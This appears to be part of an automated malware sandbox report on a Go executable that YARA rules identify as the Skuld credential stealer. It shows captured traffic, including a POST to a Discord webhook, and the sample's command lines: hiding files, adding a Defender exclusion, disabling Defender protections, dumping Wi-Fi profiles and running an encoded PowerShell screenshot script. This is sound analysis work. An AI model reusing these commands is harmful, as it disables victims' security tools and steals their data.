2024-09-03 02:18:27 UTC	538	OUT	Data Raw: 76 9a 97 f8 23 2e d9 57 cb 3d f2 5c 04 6a 1d 63 49 45 aa fe 90 7d cb b7 38 b3 40 f5 1f 22 10 21 28 01 88 d4 03 e4 1d ad aa 01 11 78 cc 23 05 15 d7 58 92 8f d6 d7 81 a4 e0 84 04 e0 13 63 f2 78 45 8e 2d 08 c0 17 2c 91 ec 1b 46 24 e1 d6 27 0b 02 70 76 b8 d4 1b 87 48 ea 8d 43 24 f5 c6 21 92 7f d0 0a ba b5 cc d4 08 22 89 37 1f 36 34 01 08 91 d8 9b 2d 2e fb 5c fe 29 36 49 22 c1 37 8a 48 f2 0d 63 41 00 ce 8f 48 f2 0d 63 41 00 2e 08 c0 0d 59 00 8a 49 09 c0 5a d4 49 e8 0d 93 7d 51 cc f7 d0 9e 1e 53 5c fd 41 02 30 12 7d 20 c1 16 4a 3f e7 d5 f3 13 80 da bb 5d 53 51 57 03 4a 14 4a 1c 12 2f 15 7f 4d 05 60 5b 35 b8 df 68 01 08 a3 04 20 15 80 1c 01 ae 2b fc 24 fe 84 57 fd 49 04 96 71 20 fd 1c 9e f3 87 ec f3 67 fd 21 f6 24 01 79 26 a0 e6 1c e6 ca da dc 57 c5 1f 7d 89 3b Data Ascii: v#.W=\jcIE}8@"!(x#XcxE-,F$'pvHC$!"764-.\)6I"7HcAHcA.YIZI}QS\A0} J?]SQWJJ/M`[5h +$WIq g!$y&W};
2024-09-03 02:18:27 UTC	4744	OUT	Data Raw: 7b 94 6b 37 22 cf e5 9d a3 79 70 f9 87 d8 43 e2 49 00 d6 12 50 f9 9a 73 24 ff 90 8b e5 b8 ef e6 39 df 8e 02 fb 73 01 11 77 48 3c 40 dc 49 fe 49 ec 11 43 e4 a9 af 5c c6 b4 e4 6a 9d e4 1f 31 cd 2f 08 c0 01 44 32 6b 6d 10 5d 7b 1c a2 3d 37 24 22 c9 37 8a 48 c4 ad 2f 16 04 e0 ec 70 a9 37 0e 91 d4 1b 87 48 ea 8d 43 24 ff a0 8b 7c 5b 07 44 d2 cf 89 24 de 7c 98 21 00 47 10 1d fb 75 22 e9 e7 44 c2 6f 14 91 e8 1b 84 cb 3e 97 7f 8a 4d 9a 48 f2 0d 23 92 7c c3 58 10 80 f3 23 92 7c c3 70 01 38 09 09 b8 20 00 67 c7 82 00 1c 4f 00 d6 8c 2b 00 5d dc f5 89 b9 1c 43 fe d5 02 10 34 56 ac 1e 6b 1f f5 35 16 3e 1e 25 00 85 84 9c 90 00 d4 bc aa 03 35 2f 71 37 88 51 02 50 92 91 7e 99 ab a8 25 60 2b 00 79 09 48 66 d0 4b 40 46 89 3f 27 3a 02 ac 3e f2 8f e7 00 4a 00 22 f6 5c 00 d6 Data Ascii: {k7"ypCIPs$9swH<@IIC\j1/D2km]{=7$"7H/p7HC$\|[D$\|!Gu"Do>MH#\|X#\|p8 gO+]C4Vk5>%5/q7QP~%`+yHfK@F?':>J"\
2024-09-03 02:18:27 UTC	5930	OUT	Data Raw: 7b 04 cf fd 73 22 c1 37 0c 97 7f 93 16 80 e0 72 af 66 41 00 4e 5e 00 ce f9 d9 7f 22 90 7a e3 20 d1 37 88 48 fa 39 91 f4 73 7e 9b 04 60 24 fd 9c 48 f0 8d 22 92 7f 80 d4 9b 94 00 2c 04 f2 2e 12 7d 12 80 b3 95 80 91 f4 8b f0 23 c0 7a 06 60 11 81 26 f5 6a d9 87 9c 8b e4 9f 98 8d 00 2c 52 6f 40 1c f4 2c 3f c5 11 7a c2 c5 5f 4b 93 c7 1a 40 f8 e9 08 b0 d0 11 e0 1a 49 bd 5a f4 0d 1b eb 19 80 fe e2 0f 49 3e 89 be 5a fa 81 e2 1c f3 d5 d1 5f 17 80 ad 18 6c a4 9e 04 9f 50 cc e7 38 f6 4b ab a3 c0 45 1e 36 a2 0e 81 17 09 40 ef 4b 12 7a 55 a0 62 f4 bd 72 50 6b 25 f5 10 79 20 b1 e7 31 90 08 54 5c 92 50 c2 50 c7 77 7b 55 7f 5e 11 98 f3 1b 09 28 01 28 18 d7 f2 4f f1 1e c8 c0 5e 15 a0 bf 04 44 cf 00 94 c4 43 f0 51 e9 07 88 3f 7f d1 87 d0 7c 8d 44 5f 24 ff 78 43 30 cf fe 43 Data Ascii: {s"7rfAN^"z 7H9s~`$H",.}#z`&j,Ro@,?z_K@IZI>Z_lP8KE6@KzUbrPk%y 1T\PPw{U^((O^DCQ?\|D_$xC0C
2024-09-03 02:18:27 UTC	7116	OUT	Data Raw: f5 dc bf 5a b2 21 d8 10 71 2e e9 c8 fd 77 3b e5 3f 57 79 1e 51 c7 9c e6 19 0b f6 d1 1a 50 9e ef a5 b8 2a 06 07 e5 30 cf 7e da d7 e7 e9 bb c4 a3 75 24 fe 78 06 20 e3 15 ec c5 3d e6 cf 45 9c 79 17 7a 9a a3 d5 7a d6 12 d3 18 18 13 2f fb 36 f2 4d 55 7a c8 35 09 3a 8e e0 aa 2f d1 47 ab be 04 9f af ab 21 ce bc de 26 5c e7 b2 87 f2 14 a7 65 7f ad 45 00 4a f8 31 cf 3e cc 31 96 9c 9b ae e8 eb 09 40 c6 9d 97 fc ac 8c 15 03 a4 1d 48 00 4a f6 69 8d c4 9e f6 d5 9e ca d3 3a 28 73 19 44 5e ef 59 7f f9 fb 61 3e c7 24 f8 ca 71 60 1b d3 6a 4c fe c4 04 e0 1f 7c eb f1 50 f8 0d 43 32 f0 ca 7b 9f 4c df be f6 a1 f4 be b3 ef 6f 44 df 60 66 48 bf 1f f5 4b 3f e7 cf 8f bd 27 94 6e 7d b8 ec 8b 88 d6 38 d1 1a 27 5a 63 0c 16 80 c7 a6 f4 c0 37 32 5f 4f bf 7e ec fc 22 fa c4 33 b7 dc 9c Data Ascii: Z!q.w;?WyQP*0~u$x =Eyzz/6MUz5:/G!&\eEJ1>1@HJi:(sD^Ya>$q`jL\|PC2{LoD`fHK?'n}8'Zc72_O~"3
2024-09-03 02:18:27 UTC	8302	OUT	Data Raw: cf 7d 09 40 07 d9 e7 c2 cf 05 a0 c4 9d 84 1d 31 21 f9 27 91 57 e7 46 e3 f2 66 e0 8c c7 24 f9 40 32 4f 82 0f 89 b7 fc 55 f9 7b d8 bb 57 ed a7 98 72 10 80 9e 5b c3 9a 41 95 7c 5e b5 27 29 47 1f 7c 0e 10 79 83 f0 f5 f5 1a 49 40 e5 79 ee d2 3d 7b 48 f4 09 8d 39 1a 0c 92 7f 12 72 02 91 27 24 f0 78 f9 c7 8a bd f2 77 69 52 d0 65 9e f2 e9 6b 9e 3e ad 5f 47 6d 59 53 55 ec 39 c4 6b e9 27 c1 47 1f 59 e8 f3 ea b7 f2 8f fc 9d 7a 15 7c c8 39 24 9d f7 11 77 b5 ec 93 f0 53 45 a0 e7 4b 00 6a 2d ad 44 60 9b bb cd 59 45 02 aa f2 0f f9 c7 58 31 2a 00 39 fa 0b c8 40 55 00 b6 42 cf 04 20 2f 03 41 f6 31 d6 d1 5f fa 7d b9 81 dc a3 af b8 8e 01 23 eb 68 99 d7 51 5f 47 f9 2e ff 78 03 70 1d a7 ef cf 02 74 e1 27 a9 e7 42 50 95 81 aa 06 e4 68 30 b4 b2 b0 11 75 b5 b8 03 55 f1 45 73 c2 Data Ascii: }@1!'WFf$@2OU{Wr[A\|^')G\|yI@y={H9r'$xwiRek>_GmYSU9k'GYz\|9$wSEKj-D`YEX1*9@UB /A1_}#hQ_G.xpt'BPh0uUEs
2024-09-03 02:18:27 UTC	6676	OUT	Data Raw: 8d c3 5c 04 e0 5c 18 26 00 25 ce e8 2f ca b9 91 bc 9b 04 d1 e7 1f 87 d9 0a c0 a9 2f f7 13 49 bc 49 b1 36 04 60 4d 24 f9 86 11 49 bf 51 74 e7 29 00 fb 08 a4 de 38 44 d2 cf 71 c1 37 8c 5a d4 0d 8a 4f 9a a9 43 a6 89 84 de 7c 99 3a 78 9a 48 ee d5 b1 51 d4 e2 6f 10 91 0c ec 23 90 79 73 21 ae 0a 9c 3d 2e 00 e7 22 01 91 79 c3 68 45 df 00 bc fa 4f 02 b0 6f 1e 89 67 44 92 6f 1c 22 c9 37 8c 45 1f 9c 49 24 fa e6 0a d2 4f b8 0c 94 04 1c cd ed 43 99 7a 77 de 6b 28 b7 8c a4 8b cc 6b a8 e3 91 f8 8b 88 e4 1f d4 02 70 18 93 14 80 2d 8d f0 ab 89 64 5f 84 cb be 5a fa 45 42 af 26 ca 85 28 17 5c 08 d6 48 0a 3a dd 37 5c 5b 18 18 6f 84 9f 24 a0 c4 9f 90 fc 73 09 e8 14 39 d7 88 3d 11 09 bc 41 48 00 6a 2c 11 28 d8 0f 61 d8 45 cc 21 ef 90 79 88 b7 4c 54 01 28 99 27 24 f1 34 4f bf Data Ascii: \\&%//II6`M$IQt)8Dq7ZOC\|:xHQo#ys!=."yhEOogDo"7EI$OCzwk(kp-d_ZEB&(\H:7\[o$s9=AHj,(aE!yLT('$4O
2024-09-03 02:18:27 UTC	10674	OUT	Data Raw: 41 00 ae 3f 01 08 b5 98 8b c4 de 6c a9 f7 9a 8b 00 8c 84 9f 53 e7 47 92 6f 18 e3 0a c0 51 84 b2 2f 22 10 75 e0 b2 2f 62 94 00 6c 45 1e 7b 35 7d 70 d1 e7 e2 cf 29 eb e6 21 00 41 82 4f 48 dc d5 b2 4f 32 4f 39 92 7a b5 f8 13 be 0f b2 cf 41 00 42 24 00 5d fe 15 1a 61 27 18 23 f4 1c 9f f3 fc 5a fc f9 3c 92 10 09 e8 d2 6f 11 82 0e 51 d7 1c ff 05 49 3d c9 3b 17 78 83 e2 35 cc 69 bf 5a 02 22 e2 24 f8 10 7a 12 7d 0e 39 92 76 8a b1 46 31 fa 1a 2b 06 2e 05 81 b1 e6 69 8b 0c 34 b1 27 b9 27 18 f3 9c 3f e6 3d 8e 20 24 d6 d9 f5 fc 56 00 4a 02 4a f0 b9 e4 43 0a d2 a7 f5 be 04 a0 aa 02 e9 b7 e3 5d 72 9f ea b8 dd 2e 69 ab f7 24 ee 5c e4 31 4f 1e fd 3a 47 7b 0c 43 15 7e 42 a2 8f be 64 1e ad 9e 13 a8 98 e7 22 fb c0 e3 6d 6c a7 de 0b 42 5c f4 d1 2f c7 7f 77 be a0 48 3e bd 1c Data Ascii: A?lSGoQ/"u/blE{5}p)!AOHO2O9zAB$]a'#Z<oQI=;x5iZ"$z}9vF1+.i4''?= $VJJC]r.i$\1O:G{C~Bd"mlB\/wH>
2024-09-03 02:18:27 UTC	11860	OUT	Data Raw: b3 f9 ce fe 50 e3 bb d2 ea ed f3 67 fc ab 37 a5 d5 c8 d1 f7 e7 f5 ff 6b 8f 22 04 11 80 45 02 be 3c ef b3 fd 71 79 9f 9e e4 2b b2 b0 48 b5 2b 7b fb 96 df e1 c9 69 d5 7f fa a3 d4 d9 fc c8 36 af ac 6b 04 60 67 eb e6 bb da fe 6f 53 e7 0f de 9b f3 4f 4d ab fe 34 f7 0b 1f cd e3 fc 3b c8 73 dd ad f3 75 a9 02 8c e4 1f 50 fd 47 45 de ed 27 a4 8d 59 8b c4 93 08 2c fb e4 cf b7 79 fe bd 21 d8 76 39 30 75 b9 76 11 83 f9 f7 49 fc 0f 80 eb 57 7f fe b8 af 22 e0 a0 f9 b3 c2 fc eb 4e ce bf d4 c3 ca b5 ba 7f b9 45 91 80 dd 03 be d9 63 df 2f a5 8d 4f c8 bf 8f af ed 9b 36 fe 7c fe 7d e4 b6 c8 3e f6 28 e2 2e ef d1 dc 4b 77 e7 4f 16 7a f7 72 66 5a f5 1f f3 77 f5 07 3b a7 d5 f9 8f fc 89 ef df a2 77 bf 45 f8 65 f6 69 7e 67 ed bd e6 cf b4 5d be fe 96 ef 4c 53 6f fb 71 28 fd 6a 5c Data Ascii: Pg7k"E<qy+H+{i6k`goSOM4;suPGE'Y,y!v90uvIW"NEc/O6\|}>(.KwOzrfZw;wEei~g]LSoq(j\
2024-09-03 02:18:28 UTC	1245	IN	HTTP/1.1 404 Not Found Date: Tue, 03 Sep 2024 02:18:28 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=ce8c3e3a699a11ef885c861c87208c5b; Expires=Sun, 02-Sep-2029 02:18:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1725329909 x-ratelimit-reset-after: 1 via: 1.1 google alt-svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zoDZnNrvKQU3FKHqkiZyf8QxUKCBYZn9HbypJ2KuWGjEpHv2GG%2B%2Ba1j7ToXhtiJDC6INnug2%2FCEPRJo47kHAX%2BRA8sMiIqqTaJjHsV08Y1%2FXGt32zunfy56fTJPAd0FKMA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=ce8c3e3a699a11ef885c861c87208c5be0709388e457b6edfba9d0d0a95cfdc8459dc91a9723948986eaf18ae2548e31; Expires=Sun, 02-Sep-2029 02:18:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49721	162.159.128.233	443	2244	C:\Users\user\Desktop\TMPN.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-03 02:18:28 UTC	325	OUT	POST /api/webhooks/1277694857338687561/FxXidvF_Xcdm1mFBnfMwjGWhByymrClV-px0CZhfTr9YtQWuA8etVIU6_PpLcbsJWD9d HTTP/1.1 Host: ptb.discord.com User-Agent: Go-http-client/1.1 Content-Length: 287 Content-Type: multipart/form-data; boundary=4ade72f423b4f00d7f5e9b4338f406874edce949762a3e33721e57bdc16e Accept-Encoding: gzip
2024-09-03 02:18:28 UTC	287	OUT	Data Raw: 2d 2d 34 61 64 65 37 32 66 34 32 33 62 34 66 30 30 64 37 66 35 65 39 62 34 33 33 38 66 34 30 36 38 37 34 65 64 63 65 39 34 39 37 36 32 61 33 65 33 33 37 32 31 65 35 37 62 64 63 31 36 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 61 79 6c 6f 61 64 5f 6a 73 6f 6e 22 0d 0a 0d 0a 7b 22 61 76 61 74 61 72 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 69 2e 69 62 62 2e 63 6f 2f 47 46 5a 32 74 48 4a 2f 73 68 61 6b 61 62 61 69 61 6e 6f 2d 31 36 37 34 32 38 32 34 38 37 2e 6a 70 67 22 2c 22 65 6d 62 65 64 73 22 3a 5b 5d 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 6b 75 6c 64 22 7d 0a 0d 0a 2d 2d 34 61 64 65 37 32 66 34 32 33 62 34 66 30 30 64 37 66 35 65 39 62 34 33 33 38 66 34 30 36 38 37 Data Ascii: --4ade72f423b4f00d7f5e9b4338f406874edce949762a3e33721e57bdc16eContent-Disposition: form-data; name="payload_json"{"avatar_url":"https://i.ibb.co/GFZ2tHJ/shakabaiano-1674282487.jpg","embeds":[],"username":"skuld"}--4ade72f423b4f00d7f5e9b4338f40687
2024-09-03 02:18:29 UTC	1239	IN	HTTP/1.1 404 Not Found Date: Tue, 03 Sep 2024 02:18:28 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=cef382f2699a11efa2c86208c9432e89; Expires=Sun, 02-Sep-2029 02:18:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1725329910 x-ratelimit-reset-after: 1 via: 1.1 google alt-svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cEpoD2a3bnS8S0j1b9RlhsBmI7HU4JD1PoJyHiUwrE368H%2B4LbFt5yfpLlQQX09ymwdfLz8yz6s5tcmEoRCh0fknhvIYmyfpD1FzD%2BzAcuNOIyeUHztHLu71841qDa43ng%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=cef382f2699a11efa2c86208c9432e89087cfdf58b0aad585043413866e0be8f63226f7ae3001b5d0b1773448fa2a367; Expires=Sun, 02-Sep-2029 02:18:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
2024-09-03 02:18:29 UTC	347	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 72 75 69 64 3d 61 32 31 32 62 37 36 38 66 39 66 61 37 62 35 35 37 61 61 30 63 64 38 62 66 62 34 61 30 38 30 34 33 33 33 37 34 30 61 35 2d 31 37 32 35 33 32 39 39 30 38 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 6b 71 5a 59 31 76 4b 4b 73 58 7a 65 4e 6b 32 61 50 62 49 49 35 50 6e 72 30 4f 76 7a 33 48 67 61 41 68 4c 67 66 30 44 59 53 4a 38 2d 31 37 32 35 33 32 39 39 30 38 39 38 36 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 Data Ascii: Set-Cookie: __cfruid=a212b768f9fa7b557aa0cd8bfb4a0804333740a5-1725329908; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneSet-Cookie: _cfuvid=kqZY1vKKsXzeNk2aPbII5Pnr0Ovz3HgaAhLgf0DYSJ8-1725329908986-0.0.1.1-604800000; path=/; domain=.discor
2024-09-03 02:18:29 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Target ID:	0
Start time:	22:17:59
Start date:	02/09/2024
Path:	C:\Users\user\Desktop\TMPN.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\TMPN.exe"
Imagebase:	0x260000
File size:	14'904'320 bytes
MD5 hash:	59A08BB8BF4881E814FD3D36F525DA8A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Go lang
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.4580262694.0000000000705000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_SkuldStealer, Description: Yara detected Skuld Stealer, Source: 00000000.00000002.4580262694.0000000000705000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.2120936249.0000000000705000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_SkuldStealer, Description: Yara detected Skuld Stealer, Source: 00000000.00000000.2120936249.0000000000705000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_SkuldStealer, Description: Yara detected Skuld Stealer, Source: 00000000.00000002.4583102943.0000000001076000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_SkuldStealer, Description: Yara detected Skuld Stealer, Source: 00000000.00000000.2121587219.0000000001076000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	22:17:59
Start date:	02/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	22:17:59
Start date:	02/09/2024
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +h +s C:\Users\user\Desktop\TMPN.exe
Imagebase:	0x7ff712f60000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	22:17:59
Start date:	02/09/2024
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +h +s C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
Imagebase:	0x7ff712f60000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	22:18:00
Start date:	02/09/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic csproduct get UUID
Imagebase:	0x7ff7843a0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	22:18:01
Start date:	02/09/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff7843a0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	22:18:02
Start date:	02/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\TMPN.exe
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	22:18:02
Start date:	02/09/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic os get Caption
Imagebase:	0x7ff7843a0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	22:18:04
Start date:	02/09/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic cpu get Name
Imagebase:	0x7ff7843a0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	22:18:06
Start date:	02/09/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff7843a0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	22:18:07
Start date:	02/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	22:18:07
Start date:	02/09/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic csproduct get UUID
Imagebase:	0x7ff7843a0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	22:18:09
Start date:	02/09/2024
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh wlan show profiles
Imagebase:	0x7ff642be0000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	22:18:10
Start date:	02/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAA